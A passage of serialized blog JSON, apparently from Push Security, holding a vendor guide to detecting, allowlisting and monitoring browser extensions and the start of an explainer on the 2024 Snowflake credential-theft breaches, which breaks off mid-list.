executes in the victim’s browser. ",[3113],{"type":370},{},{"nodeType":178,"data":3116,"content":3117},{},[3118],{"nodeType":173,"value":3119,"marks":3120,"data":3121},"Today, there’s no single magic bullet tool or control that organizations can use — unless you simply want to disable browser extensions altogether, which might not be the best option for users and their productivity.",[],{},{"nodeType":178,"data":3123,"content":3124},{},[3125],{"nodeType":173,"value":3126,"marks":3127,"data":3128},"Fortunately, Push is in a good position to help, with its ability to inventory all your browser extensions and help you find and block malicious ones.",[],{},{"nodeType":231,"data":3130,"content":3131},{},[],{"nodeType":169,"data":3133,"content":3134},{},[3135],{"nodeType":173,"value":3136,"marks":3137,"data":3139},"How to securely manage browser extensions (and how Push can help)",[3138],{"type":370},{},{"nodeType":178,"data":3141,"content":3142},{},[3143],{"nodeType":173,"value":3144,"marks":3145,"data":3146},"Here’s our step-by-step guide to securely using browser extensions in your organization.",[],{},{"nodeType":250,"data":3148,"content":3149},{},[3150,3169,3179,3189,3199],{"nodeType":254,"data":3151,"content":3152},{},[3153],{"nodeType":178,"data":3154,"content":3155},{},[3156,3160,3165],{"nodeType":173,"value":3157,"marks":3158,"data":3159},"Step 0: Enable ",[],{},{"nodeType":173,"value":3161,"marks":3162,"data":3164},"malicious browser extension detection",[3163],{"type":370},{},{"nodeType":173,"value":3166,"marks":3167,"data":3168}," to stop known-bad extensions from running in your environment. ",[],{},{"nodeType":254,"data":3170,"content":3171},{},[3172],{"nodeType":178,"data":3173,"content":3174},{},[3175],{"nodeType":173,"value":3176,"marks":3177,"data":3178},"Step 1: Establish an inventory of extensions currently in use across your users and their browsers. ",[],{},{"nodeType":254,"data":3180,"content":3181},{},[3182],{"nodeType":178,"data":3183,"content":3184},{},[3185],{"nodeType":173,"value":3186,"marks":3187,"data":3188},"Step 2: Risk-assess the extensions running in your environment using Push data.",[],{},{"nodeType":254,"data":3190,"content":3191},{},[3192],{"nodeType":178,"data":3193,"content":3194},{},[3195],{"nodeType":173,"value":3196,"marks":3197,"data":3198},"Step 3: Create an allowlist or blocklist to control the extensions active in your environment.",[],{},{"nodeType":254,"data":3200,"content":3201},{},[3202],{"nodeType":178,"data":3203,"content":3204},{},[3205],{"nodeType":173,"value":3206,"marks":3207,"data":3208},"Step 4: Monitor for risky changes.",[],{},{"nodeType":235,"data":3210,"content":3211},{},[3212],{"nodeType":173,"value":3213,"marks":3214,"data":3216},"Step 0: Enable malicious browser extension detection in the Push platform",[3215],{"type":370},{},{"nodeType":178,"data":3218,"content":3219},{},[3220],{"nodeType":173,"value":3221,"marks":3222,"data":3223},"First, we recommend you take action to ensure that extensions reported as suspicious or malicious are blocked from running in your environment. ",[],{},{"nodeType":312,"data":3225,"content":3229},{"target":3226},{"sys":3227},{"id":3228,"type":317,"linkType":318},"yniMglSNypgyxmdGVcFxJ",[],{"nodeType":312,"data":3231,"content":3235},{"target":3232},{"sys":3233},{"id":3234,"type":317,"linkType":318},"37bID8AChVgerAnD6q8NPZ",[],{"nodeType":178,"data":3237,"content":3238},{},[3239],{"nodeType":173,"value":3240,"marks":3241,"data":3242},"If you’re a Push customer, you can ensure that any extension that is reported as malicious is automatically blocked in your environment. This means that the extension gets disabled and cannot run in any browser with the Push extension installed. ",[],{},{"nodeType":178,"data":3244,"content":3245},{},[3246],{"nodeType":173,"value":3247,"marks":3248,"data":3249},"The Push Security research team maintains a global list of known-bad extensions based on threat intelligence reporting. This list is continuously updated and ensures that as soon as an extension is reported as malicious, it is blocked. ",[],{},{"nodeType":178,"data":3251,"content":3252},{},[3253,3257,3265],{"nodeType":173,"value":3254,"marks":3255,"data":3256},"You can enable the control via the Controls page in the Push admin console. Admins can configure rules in Off, Monitor, or Block mode. Block mode is recommended, meaning that extensions are disabled and web store access is blocked. You can read more about this in our ",[],{},{"nodeType":186,"data":3258,"content":3260},{"uri":3259},"https://pushsecurity.com/help/how-does-push-detect-malicious-browser-extensions",[3261],{"nodeType":173,"value":3262,"marks":3263,"data":3264},"Help Center",[],{},{"nodeType":173,"value":2340,"marks":3266,"data":3267},[],{},{"nodeType":178,"data":3269,"content":3270},{},[3271],{"nodeType":173,"value":3272,"marks":3273,"data":3274},"When an extension is flagged as malicious, a detection event will be generated and appear on the Detections page in the Push admin console. The severity of these detections is classified as follows:",[],{},{"nodeType":250,"data":3276,"content":3277},{},[3278,3293,3308],{"nodeType":254,"data":3279,"content":3280},{},[3281],{"nodeType":178,"data":3282,"content":3283},{},[3284,3289],{"nodeType":173,"value":3285,"marks":3286,"data":3288},"Low",[3287],{"type":370},{},{"nodeType":173,"value":3290,"marks":3291,"data":3292}," for an extension that has never been enabled. The control prevented either the installation or the extension from being enabled.",[],{},{"nodeType":254,"data":3294,"content":3295},{},[3296],{"nodeType":178,"data":3297,"content":3298},{},[3299,3304],{"nodeType":173,"value":3300,"marks":3301,"data":3303},"Medium",[3302],{"type":370},{},{"nodeType":173,"value":3305,"marks":3306,"data":3307}," for an extension that was installed and enabled, but has been disabled by the control. ",[],{},{"nodeType":254,"data":3309,"content":3310},{},[3311],{"nodeType":178,"data":3312,"content":3313},{},[3314,3319],{"nodeType":173,"value":3315,"marks":3316,"data":3318},"High",[3317],{"type":370},{},{"nodeType":173,"value":3320,"marks":3321,"data":3322}," if the extension was enabled and is still active (i.e. the control was in monitor mode).",[],{},{"nodeType":312,"data":3324,"content":3328},{"target":3325},{"sys":3326},{"id":3327,"type":317,"linkType":318},"1yOPlBKtLGYyN80OCJ9qMn",[],{"nodeType":235,"data":3330,"content":3331},{},[3332],{"nodeType":173,"value":3333,"marks":3334,"data":3336},"Step 1: Establish an inventory of existing extensions.",[3335],{"type":370},{},{"nodeType":178,"data":3338,"content":3339},{},[3340,3344,3349,3353],{"nodeType":173,"value":3341,"marks":3342,"data":3343},"Next, we recommend you take stock of what’s already running in your environment so you can begin to make risk-based decisions about what you allow, and what you don’t. This means building an inventory of ",[],{},{"nodeType":173,"value":3345,"marks":3346,"data":3348},"every extension ",[3347],{"type":370},{},{"nodeType":173,"value":3350,"marks":3351,"data":3352},"running in ",[],{},{"nodeType":173,"value":3354,"marks":3355,"data":3357},"every browser. ",[3356],{"type":370},{},{"nodeType":178,"data":3359,"content":3360},{},[3361],{"nodeType":173,"value":3362,"marks":3363,"data":3364},"Push provides real-time visibility of extensions installed in every browser across your workforce. ",[],{},{"nodeType":178,"data":3366,"content":3367},{},[3368],{"nodeType":173,"value":3369,"marks":3370,"data":3371},"Push tracks several key data points, including: ",[],{},{"nodeType":250,"data":3373,"content":3374},{},[3375,3385,3395,3405,3415,3425,3435,3445,3455],{"nodeType":254,"data":3376,"content":3377},{},[3378],{"nodeType":178,"data":3379,"content":3380},{},[3381],{"nodeType":173,"value":3382,"marks":3383,"data":3384},"Extension name, ID, and version number",[],{},{"nodeType":254,"data":3386,"content":3387},{},[3388],{"nodeType":178,"data":3389,"content":3390},{},[3391],{"nodeType":173,"value":3392,"marks":3393,"data":3394},"Update & homepage URL",[],{},{"nodeType":254,"data":3396,"content":3397},{},[3398],{"nodeType":178,"data":3399,"content":3400},{},[3401],{"nodeType":173,"value":3402,"marks":3403,"data":3404},"Extension permissions",[],{},{"nodeType":254,"data":3406,"content":3407},{},[3408],{"nodeType":178,"data":3409,"content":3410},{},[3411],{"nodeType":173,"value":3412,"marks":3413,"data":3414},"Host permissions (where applicable)",[],{},{"nodeType":254,"data":3416,"content":3417},{},[3418],{"nodeType":178,"data":3419,"content":3420},{},[3421],{"nodeType":173,"value":3422,"marks":3423,"data":3424},"Deployment method (e.g. managed, manual, sideloaded or development)",[],{},{"nodeType":254,"data":3426,"content":3427},{},[3428],{"nodeType":178,"data":3429,"content":3430},{},[3431],{"nodeType":173,"value":3432,"marks":3433,"data":3434},"Which employees use the extension",[],{},{"nodeType":254,"data":3436,"content":3437},{},[3438],{"nodeType":178,"data":3439,"content":3440},{},[3441],{"nodeType":173,"value":3442,"marks":3443,"data":3444},"Which browsers have the extension installed",[],{},{"nodeType":254,"data":3446,"content":3447},{},[3448],{"nodeType":178,"data":3449,"content":3450},{},[3451],{"nodeType":173,"value":3452,"marks":3453,"data":3454},"Whether the extension is enabled or disabled",[],{},{"nodeType":254,"data":3456,"content":3457},{},[3458],{"nodeType":178,"data":3459,"content":3460},{},[3461],{"nodeType":173,"value":3462,"marks":3463,"data":3464},"Useful metadata like install count, ownership history, update history, and whether the extension has been unlisted from the web store.",[],{},{"nodeType":178,"data":3466,"content":3467},{},[3468],{"nodeType":173,"value":3469,"marks":3470,"data":3471},"This information is critical for assessing risk, as well as providing an early warning of future malicious intent. ",[],{},{"nodeType":178,"data":3473,"content":3474},{},[3475,3479,3484],{"nodeType":173,"value":3476,"marks":3477,"data":3478},"You can enable browser extension visibility in the Push platform by going to ",[],{},{"nodeType":173,"value":3480,"marks":3481,"data":3483},"Settings > Organization > Browser extension visibility",[3482],{"type":370},{},{"nodeType":173,"value":3485,"marks":3486,"data":3487}," and toggling on the feature.",[],{},{"nodeType":312,"data":3489,"content":3493},{"target":3490},{"sys":3491},{"id":3492,"type":317,"linkType":318},"2LCwZNbSazYGIEfWHZKJRU",[],{"nodeType":235,"data":3495,"content":3496},{},[3497],{"nodeType":173,"value":3186,"marks":3498,"data":3500},[3499],{"type":370},{},{"nodeType":178,"data":3502,"content":3503},{},[3504],{"nodeType":173,"value":3505,"marks":3506,"data":3507},"Now that you’ve built a real-time inventory, you can start to analyse the data to find risky extensions. ",[],{},{"nodeType":178,"data":3509,"content":3510},{},[3511],{"nodeType":173,"value":3512,"marks":3513,"data":3514},"Every extension that is running in your environment expands your potential attack surface, representing another node that can be compromised by an attacker. So it makes sense to only allow those that are absolutely necessary in order to sensibly control the risk. ",[],{},{"nodeType":178,"data":3516,"content":3517},{},[3518],{"nodeType":173,"value":3519,"marks":3520,"data":3521},"You can start to investigate and prune extensions based on the properties tracked in the Push platform. For example:",[],{},{"nodeType":250,"data":3523,"content":3524},{},[3525,3535,3563,3573],{"nodeType":254,"data":3526,"content":3527},{},[3528],{"nodeType":178,"data":3529,"content":3530},{},[3531],{"nodeType":173,"value":3532,"marks":3533,"data":3534},"Extensions with a low install count from an unverified publisher. ",[],{},{"nodeType":254,"data":3536,"content":3537},{},[3538],{"nodeType":178,"data":3539,"content":3540},{},[3541,3545,3550,3554,3559],{"nodeType":173,"value":3542,"marks":3543,"data":3544},"Extensions that have been ",[],{},{"nodeType":173,"value":3546,"marks":3547,"data":3549},"sideloaded",[3548],{"type":370},{},{"nodeType":173,"value":3551,"marks":3552,"data":3553}," (installed by software on the machine) or are ",[],{},{"nodeType":173,"value":3555,"marks":3556,"data":3558},"development",[3557],{"type":370},{},{"nodeType":173,"value":3560,"marks":3561,"data":3562}," (installed from a folder off-disk when Developer mode is turned on)",[],{},{"nodeType":254,"data":3564,"content":3565},{},[3566],{"nodeType":178,"data":3567,"content":3568},{},[3569],{"nodeType":173,"value":3570,"marks":3571,"data":3572},"Extensions that are used by a small number of employees for niche / non-critical functions. ",[],{},{"nodeType":254,"data":3574,"content":3575},{},[3576],{"nodeType":178,"data":3577,"content":3578},{},[3579],{"nodeType":173,"value":3580,"marks":3581,"data":3582},"Extensions with risky permissions.",[],{},{"nodeType":312,"data":3584,"content":3588},{"target":3585},{"sys":3586},{"id":3587,"type":317,"linkType":318},"FpGNvFgEGj6eAGihoWEUi",[],{"nodeType":312,"data":3590,"content":3594},{"target":3591},{"sys":3592},{"id":3593,"type":317,"linkType":318},"5JccSPh103QIQJxIh9pk4x",[],{"nodeType":235,"data":3596,"content":3597},{},[3598],{"nodeType":173,"value":3599,"marks":3600,"data":3602},"Step 3: Create an allowlist to control the extensions active in your environment.",[3601],{"type":370},{},{"nodeType":178,"data":3604,"content":3605},{},[3606],{"nodeType":173,"value":3607,"marks":3608,"data":3609},"Using the output of your risk assessment and the data provided by the Push platform, you can control the extensions that you allow your employees to use.",[],{},{"nodeType":178,"data":3611,"content":3612},{},[3613],{"nodeType":173,"value":3614,"marks":3615,"data":3616},"To do this, you need to allowlist the extensions you’re happy for employees to use (and block everything else). That way, you remove the ability for employees to add new extensions unless approved by an admin. This means you either:",[],{},{"nodeType":250,"data":3618,"content":3619},{},[3620,3630],{"nodeType":254,"data":3621,"content":3622},{},[3623],{"nodeType":178,"data":3624,"content":3625},{},[3626],{"nodeType":173,"value":3627,"marks":3628,"data":3629},"Add every extension you currently have running in your environment to an allowlist, block everything else, and then start to prune extensions from that list. ",[],{},{"nodeType":254,"data":3631,"content":3632},{},[3633],{"nodeType":178,"data":3634,"content":3635},{},[3636],{"nodeType":173,"value":3637,"marks":3638,"data":3639},"Create a shortened allowlist from the outset. ",[],{},{"nodeType":178,"data":3641,"content":3642},{},[3643],{"nodeType":173,"value":3644,"marks":3645,"data":3646},"Both are valid ways of solving the problem, with the first option being the least potentially disruptive (i.e. you’re not switching off a load of extensions in one go). That said, this might not be a viable solution depending on your company size. ",[],{},{"nodeType":312,"data":3648,"content":3652},{"target":3649},{"sys":3650},{"id":3651,"type":317,"linkType":318},"6wQW4VqLeLXMXdPPWLhQAF",[],{"nodeType":178,"data":3654,"content":3655},{},[3656,3661,3671],{"nodeType":173,"value":3657,"marks":3658,"data":3660},"You can do this in lots of different ways depending on the OS and browsers used across your workforce. This can get messy depending on the complexity of your environment. But you can do it in a streamlined, browser-agnostic way ",[3659],{"type":370},{},{"nodeType":186,"data":3662,"content":3664},{"uri":3663},"https://pushsecurity.com/help/10138/#start",[3665],{"nodeType":173,"value":3666,"marks":3667,"data":3670},"using Push",[3668,3669],{"type":194},{"type":370},{},{"nodeType":173,"value":197,"marks":3672,"data":3674},[3673],{"type":370},{},{"nodeType":312,"data":3676,"content":3680},{"target":3677},{"sys":3678},{"id":3679,"type":317,"linkType":318},"97dDukjKsRsAptpHV1kpn",[],{"nodeType":178,"data":3682,"content":3683},{},[3684],{"nodeType":173,"value":3685,"marks":3686,"data":3687},"Managing which extensions you’ve opted to allow is a continuous process that will change as user behavior changes and new extensions are added. It’s important that you regularly review whether your current allowlist is fit for purpose. ",[],{},{"nodeType":235,"data":3689,"content":3690},{},[3691],{"nodeType":173,"value":3206,"marks":3692,"data":3694},[3693],{"type":370},{},{"nodeType":178,"data":3696,"content":3697},{},[3698],{"nodeType":173,"value":3699,"marks":3700,"data":3701},"Finally, once you’ve begun the process of pruning the extensions in your environment and you’ve reached a baseline you’re happy with, it’s now about reviewing and approving any new extension requests, and monitoring for risky changes. ",[],{},{"nodeType":178,"data":3703,"content":3704},{},[3705],{"nodeType":173,"value":3706,"marks":3707,"data":3708},"We recommend monitoring for things like:",[],{},{"nodeType":250,"data":3710,"content":3711},{},[3712,3722,3732],{"nodeType":254,"data":3713,"content":3714},{},[3715],{"nodeType":178,"data":3716,"content":3717},{},[3718],{"nodeType":173,"value":3719,"marks":3720,"data":3721},"Regularly reviewing changes in extension ownership + recent updates",[],{},{"nodeType":254,"data":3723,"content":3724},{},[3725],{"nodeType":178,"data":3726,"content":3727},{},[3728],{"nodeType":173,"value":3729,"marks":3730,"data":3731},"Monitoring for updates to extensions to track risky permissions being added ",[],{},{"nodeType":254,"data":3733,"content":3734},{},[3735],{"nodeType":178,"data":3736,"content":3737},{},[3738],{"nodeType":173,"value":3739,"marks":3740,"data":3741},"Monitoring for new malicious browser extension detections",[],{},{"nodeType":178,"data":3743,"content":3744},{},[3745,3749,3758],{"nodeType":173,"value":3746,"marks":3747,"data":3748},"It’s super simple to use Push data to create alerts and feed your detection and response workflows. ",[],{},{"nodeType":186,"data":3750,"content":3752},{"uri":3751},"https://pushsecurity.com/help/audience/administrators/docs/connect-to-siem-or-soar/#start",[3753],{"nodeType":173,"value":3754,"marks":3755,"data":3757},"See how to connect Push to your SIEM/SOAR and learn more about the Push REST API and webhooks. ",[3756],{"type":194},{},{"nodeType":173,"value":37,"marks":3759,"data":3760},[],{},{"nodeType":178,"data":3762,"content":3763},{},[3764],{"nodeType":173,"value":3765,"marks":3766,"data":3767},"At this point, you can then triage and investigate further to see whether additional action is required. ",[],{},{"nodeType":3769,"data":3770,"content":3771},"blockquote",{},[3772],{"nodeType":178,"data":3773,"content":3774},{},[3775],{"nodeType":173,"value":3776,"marks":3777,"data":3779},"And there you have it! You’ve secured browser extension use across your organization using Push. ",[3778],{"type":370},{},{"nodeType":231,"data":3781,"content":3782},{},[],{"nodeType":235,"data":3784,"content":3785},{},[3786],{"nodeType":173,"value":3787,"marks":3788,"data":3790},"Don’t take our word for it …",[3789],{"type":370},{},{"nodeType":178,"data":3792,"content":3793},{},[3794],{"nodeType":173,"value":3795,"marks":3796,"data":3797},"Our friends at GitLab echo our thoughts on browser extensions and the value of tools like Push that help them to solve this problem.",[],{},{"nodeType":312,"data":3799,"content":3803},{"target":3800},{"sys":3801},{"id":3802,"type":317,"linkType":318},"1m0x2Q6MmOn7ANqCtpYptu",[],{"nodeType":231,"data":3805,"content":3806},{},[],{"nodeType":169,"data":3808,"content":3809},{},[3810],{"nodeType":173,"value":3811,"marks":3812,"data":3814},"Additional tips",[3813],{"type":370},{},{"nodeType":235,"data":3816,"content":3817},{},[3818],{"nodeType":173,"value":3819,"marks":3820,"data":3822},"Disable browser syncing",[3821],{"type":370},{},{"nodeType":178,"data":3824,"content":3825},{},[3826],{"nodeType":173,"value":3827,"marks":3828,"data":3829},"If you’re in the early stages of your extension management process, an extra step you might want to consider is disabling browser syncing for extensions. ",[],{},{"nodeType":178,"data":3831,"content":3832},{},[3833,3837,3846],{"nodeType":173,"value":3834,"marks":3835,"data":3836},"When we deploy Push, we find it’s not unusual for people to sign into their work browser with a personal email profile. There’s a significant risk here — if you end up saving and syncing credentials across devices, a compromise on a (usually less secure) personal device can lead to business accounts being compromised. Notably, this was exploited in a ",[],{},{"nodeType":186,"data":3838,"content":3840},{"uri":3839},"https://sec.okta.com/articles/harfiles/",[3841],{"nodeType":173,"value":3842,"marks":3843,"data":3845},"2023 Okta security breach",[3844],{"type":194},{},{"nodeType":173,"value":1477,"marks":3847,"data":3848},[],{},{"nodeType":178,"data":3850,"content":3851},{},[3852],{"nodeType":173,"value":3853,"marks":3854,"data":3855},"The same model applies to browser extensions. By default, any extension installed from the web store is synced across devices where a profile is logged in and syncing is enabled. ",[],{},{"nodeType":178,"data":3857,"content":3858},{},[3859],{"nodeType":173,"value":3860,"marks":3861,"data":3862},"As an example, you can see how to disable browser extension syncing if you manage Chrome in Google Workspace.",[],{},{"nodeType":312,"data":3864,"content":3868},{"target":3865},{"sys":3866},{"id":3867,"type":317,"linkType":318},"23gbN24WiOzszvwP9zy2MM",[],{"nodeType":178,"data":3870,"content":3871},{},[3872],{"nodeType":173,"value":3873,"marks":3874,"data":3875},"This only applies if you haven’t yet created an allowlist for extensions in your environment, in which case any extensions not on the list will be blocked. ",[],{},{"nodeType":178,"data":3877,"content":3878},{},[3879],{"nodeType":173,"value":3880,"marks":3881,"data":3882},"You can also use Push to surface which users are logged into their browser using a non-work profile and whether the profile is synced across devices. ",[],{},{"nodeType":312,"data":3884,"content":3888},{"target":3885},{"sys":3886},{"id":3887,"type":317,"linkType":318},"421C3CL6Sfa8gmn56X7lRI",[],{"nodeType":231,"data":3890,"content":3891},{},[],{"nodeType":169,"data":3893,"content":3894},{},[3895],{"nodeType":173,"value":2824,"marks":3896,"data":3898},[3897],{"type":370},{},{"nodeType":178,"data":3900,"content":3901},{},[3902,3905,3912],{"nodeType":173,"value":2832,"marks":3903,"data":3904},[],{},{"nodeType":186,"data":3906,"content":3907},{"uri":66},[3908],{"nodeType":173,"value":3909,"marks":3910,"data":3911},"modern attack techniques that are the leading cause of breaches today",[],{},{"nodeType":173,"value":1477,"marks":3913,"data":3914},[],{},{"nodeType":178,"data":3916,"content":3917},{},[3918],{"nodeType":173,"value":2850,"marks":3919,"data":3920},[],{},{"nodeType":178,"data":3922,"content":3923},{},[3924,3928,3936,3939,3948,3952,3959],{"nodeType":173,"value":3925,"marks":3926,"data":3927},"Want to learn more about Push? ",[],{},{"nodeType":186,"data":3929,"content":3930},{"uri":1456},[3931],{"nodeType":173,"value":3932,"marks":3933,"data":3935},"Check out our latest product overview",[3934],{"type":194},{},{"nodeType":173,"value":2936,"marks":3937,"data":3938},[],{},{"nodeType":186,"data":3940,"content":3942},{"uri":3941},"https://pushsecurity.com/product-demo/",[3943],{"nodeType":173,"value":3944,"marks":3945,"data":3947},"visit our demo library",[3946],{"type":194},{},{"nodeType":173,"value":3949,"marks":3950,"data":3951},", or ",[],{},{"nodeType":186,"data":3953,"content":3954},{"uri":1469},[3955],{"nodeType":173,"value":1472,"marks":3956,"data":3958},[3957],{"type":194},{},{"nodeType":173,"value":1477,"marks":3960,"data":3961},[],{},"Guide: How to manage and block browser extensions using Push","How to detect risky and malicious extensions and block them from running in employee browsers. ","2026-03-04T00:00:00.000Z","browser-extension-management-guide",{"items":3967},[3968,3970],{"sys":3969,"name":505},{"id":504},{"sys":3971,"name":509},{"id":508},{"items":3973},[3974],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":3976},"Dan",{"url":1496},{"__typename":1528,"sys":3978,"content":3980,"title":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":4778,"authorsCollection":4782},{"id":3979},"PAPJPr3CIB6J20udYyy1r",{"json":3981},{"data":3982,"content":3983,"nodeType":165},{},[3984,3990,4010,4017,4024,4030,4033,4041,4048,4067,4078,4085,4092,4099,4192,4195,4203,4286,4292,4295,4303,4311,4318,4325,4333,4351,4358,4366,4373,4380,4388,4395,4402,4422,4428,4431,4439,4447,4454,4559,4566,4574,4581,4588,4594,4602,4609,4616,4623,4631,4638,4645,4652,4659,4665,4668,4676,4683,4716,4723,4742,4762,4768],{"data":3985,"content":3989,"nodeType":312},{"target":3986},{"sys":3987},{"id":3988,"type":317,"linkType":318},"1eBClNW4NOR66F0tl9h6lD",[],{"data":3991,"content":3992,"nodeType":178},{},[3993,3997,4006],{"data":3994,"marks":3995,"value":3996,"nodeType":173},{},[],"The attacks on Snowflake customers in 2024 collectively constituted the biggest cyber security event of the year in terms of the number of organizations and individuals affected (at least, if you exclude CrowdStrike causing a worldwide outage in July) — certainly, it was the largest perpetrated by a criminal group against commercial enterprises. It has been touted by some news outlets as ‘",{"data":3998,"content":4000,"nodeType":186},{"uri":3999},"https://www.wired.com/story/snowflake-breach-advanced-auto-parts-lendingtree/",[4001],{"data":4002,"marks":4003,"value":4005,"nodeType":173},{},[4004],{"type":194},"one of the biggest breaches ever",{"data":4007,"marks":4008,"value":4009,"nodeType":173},{},[],"’.  ",{"data":4011,"content":4012,"nodeType":178},{},[4013],{"data":4014,"marks":4015,"value":4016,"nodeType":173},{},[],"Snowflake was a watershed moment that signalled the significant opportunity presented by identity attacks on cloud services. It demonstrated how comparatively unsophisticated methods (logging in to user accounts with stolen credentials and dumping the data) can have the same or greater impact as a traditional network or endpoint based cyber attack involving vulnerability exploitation, malware deployment, ransomware, etc. ",{"data":4018,"content":4019,"nodeType":178},{},[4020],{"data":4021,"marks":4022,"value":4023,"nodeType":173},{},[],"Here’s everything you need to know about the Snowflake attacks — and what you can do to protect yourself against the next Snowflake in the future.",{"data":4025,"content":4029,"nodeType":312},{"target":4026},{"sys":4027},{"id":4028,"type":317,"linkType":318},"4QoPUiP5q6Mwj1eWUZT15Q",[],{"data":4031,"content":4032,"nodeType":231},{},[],{"data":4034,"content":4035,"nodeType":169},{},[4036],{"data":4037,"marks":4038,"value":4040,"nodeType":173},{},[4039],{"type":370},"Snowflake: The facts",{"data":4042,"content":4043,"nodeType":178},{},[4044],{"data":4045,"marks":4046,"value":4047,"nodeType":173},{},[],"Cyber criminals associated with the threat group known as ShinyHunters claimed responsibility for breaching multiple organizations using Snowflake, a cloud-based data warehousing and analytics platform. ",{"data":4049,"content":4050,"nodeType":178},{},[4051,4055,4064],{"data":4052,"marks":4053,"value":4054,"nodeType":173},{},[],"ShinyHunters associates targeted ~165 organizations that were subjected to account takeover attacks using stolen credentials harvested from historical infostealer infections dating back as far as 2020, ",{"data":4056,"content":4058,"nodeType":186},{"uri":4057},"https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion",[4059],{"data":4060,"marks":4061,"value":4063,"nodeType":173},{},[4062],{"type":194},"according to Mandiant’s investigation",{"data":4065,"marks":4066,"value":197,"nodeType":173},{},[],{"data":4068,"content":4069,"nodeType":3769},{},[4070],{"data":4071,"content":4072,"nodeType":178},{},[4073],{"data":4074,"marks":4075,"value":4077,"nodeType":173},{},[4076],{"type":370},">80% of the compromised accounts belonging to Snowflake customers had prior credential exposure. ",{"data":4079,"content":4080,"nodeType":178},{},[4081],{"data":4082,"marks":4083,"value":4084,"nodeType":173},{},[],"The impacted accounts lacked MFA, meaning successful authentication only required a valid username and password. As the Snowflake credentials found in infostealer malware credential dumps had not been rotated or updated, they remained valid and could be used to authenticate to user accounts on Snowflake tenants belonging to various customers.",{"data":4086,"content":4087,"nodeType":178},{},[4088],{"data":4089,"marks":4090,"value":4091,"nodeType":173},{},[],"As a data warehousing platform integrated with a range of connected cloud services, access to a customer’s Snowflake tenant provided attackers with large quantities of sensitive commercial and personal data that could be stolen and monetized by attackers in a variety of ways — such as by ransoming the victim organization, extorting individual end-customers, and selling the data on to other criminal organizations. ",{"data":4093,"content":4094,"nodeType":178},{},[4095],{"data":4096,"marks":4097,"value":4098,"nodeType":173},{},[],"In total, 9 public victims were named following the breach, collectively impacting hundreds of millions of people. ",{"data":4100,"content":4101,"nodeType":250},{},[4102,4112,4122,4132,4142,4152,4162,4172,4182],{"data":4103,"content":4104,"nodeType":254},{},[4105],{"data":4106,"content":4107,"nodeType":178},{},[4108],{"data":4109,"marks":4110,"value":4111,"nodeType":173},{},[],"Lending Tree: Sensitive data for over 190 million people available online including customer details, partial credit card numbers, insurance quotes and other information, being sold for $2m.",{"data":4113,"content":4114,"nodeType":254},{},[4115],{"data":4116,"content":4117,"nodeType":178},{},[4118],{"data":4119,"marks":4120,"value":4121,"nodeType":173},{},[],"Truist Bank: Information belonging to 65,000 employees being sold online for $1m",{"data":4123,"content":4124,"nodeType":254},{},[4125],{"data":4126,"content":4127,"nodeType":178},{},[4128],{"data":4129,"marks":4130,"value":4131,"nodeType":173},{},[],"Advance Auto Parts: 3TB of data for sale for $1.5 million. Affected 2.3 million people, as well as current and former employees and job applicants.",{"data":4133,"content":4134,"nodeType":254},{},[4135],{"data":4136,"content":4137,"nodeType":178},{},[4138],{"data":4139,"marks":4140,"value":4141,"nodeType":173},{},[],"Pure Storage: Workspace with 11k customer records including company, email, LDAP username and software version numbers.",{"data":4143,"content":4144,"nodeType":254},{},[4145],{"data":4146,"content":4147,"nodeType":178},{},[4148],{"data":4149,"marks":4150,"value":4151,"nodeType":173},{},[],"Los Angeles Unified: Student data, disability information, discipline details, and parent information, being sold online for $150k.",{"data":4153,"content":4154,"nodeType":254},{},[4155],{"data":4156,"content":4157,"nodeType":178},{},[4158],{"data":4159,"marks":4160,"value":4161,"nodeType":173},{},[],"Neiman Marcus: 31m email addresses exposed alongside various personal information.",{"data":4163,"content":4164,"nodeType":254},{},[4165],{"data":4166,"content":4167,"nodeType":178},{},[4168],{"data":4169,"marks":4170,"value":4171,"nodeType":173},{},[],"Santander: 30 million customer details for sale relating to customers of Santander Chile, Spain, and Uruguay.",{"data":4173,"content":4174,"nodeType":254},{},[4175],{"data":4176,"content":4177,"nodeType":178},{},[4178],{"data":4179,"marks":4180,"value":4181,"nodeType":173},{},[],"Ticketmaster: 560 million customer details for sale, disruption to events and ticketing worldwide, increasing in scam ticket production.",{"data":4183,"content":4184,"nodeType":254},{},[4185],{"data":4186,"content":4187,"nodeType":178},{},[4188],{"data":4189,"marks":4190,"value":4191,"nodeType":173},{},[],"AT&T: Call logs stolen for approximately 109 million customers (nearly all of its mobile customers). AT&T paid an undisclosed ransom fee. ",{"data":4193,"content":4194,"nodeType":231},{},[],{"data":4196,"content":4197,"nodeType":169},{},[4198],{"data":4199,"marks":4200,"value":4202,"nodeType":173},{},[4201],{"type":370},"The Snowflake attacks step-by-step",{"data":4204,"content":4205,"nodeType":250},{},[4206,4216,4226,4236,4246,4256,4266,4276],{"data":4207,"content":4208,"nodeType":254},{},[4209],{"data":4210,"content":4211,"nodeType":178},{},[4212],{"data":4213,"marks":4214,"value":4215,"nodeType":173},{},[],"Snowflake users were infected with infostealer malware that harvested credentials from user devices over an extended period via several infostealer malware variants, including; VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER.",{"data":4217,"content":4218,"nodeType":254},{},[4219],{"data":4220,"content":4221,"nodeType":178},{},[4222],{"data":4223,"marks":4224,"value":4225,"nodeType":173},{},[],"Credentials appeared on criminal marketplaces e.g. dark web forums and Telegram channels.",{"data":4227,"content":4228,"nodeType":254},{},[4229],{"data":4230,"content":4231,"nodeType":178},{},[4232],{"data":4233,"marks":4234,"value":4235,"nodeType":173},{},[],"ShinyHunters saw the potential in targeting Snowflake users, based on the availability of credentials, number of customer organizations, and the value of the data that can be accessed in Snowflake. ",{"data":4237,"content":4238,"nodeType":254},{},[4239],{"data":4240,"content":4241,"nodeType":178},{},[4242],{"data":4243,"marks":4244,"value":4245,"nodeType":173},{},[],"ShinyHunters embarked on a large-scale campaign targeting Snowflake customer accounts using previously breached credentials. ",{"data":4247,"content":4248,"nodeType":254},{},[4249],{"data":4250,"content":4251,"nodeType":178},{},[4252],{"data":4253,"marks":4254,"value":4255,"nodeType":173},{},[],"ShinyHunters accessed user accounts that lacked MFA, belonging to approximately 165 Snowflake customers. ",{"data":4257,"content":4258,"nodeType":254},{},[4259],{"data":4260,"content":4261,"nodeType":178},{},[4262],{"data":4263,"marks":4264,"value":4265,"nodeType":173},{},[],"ShinyHunters used 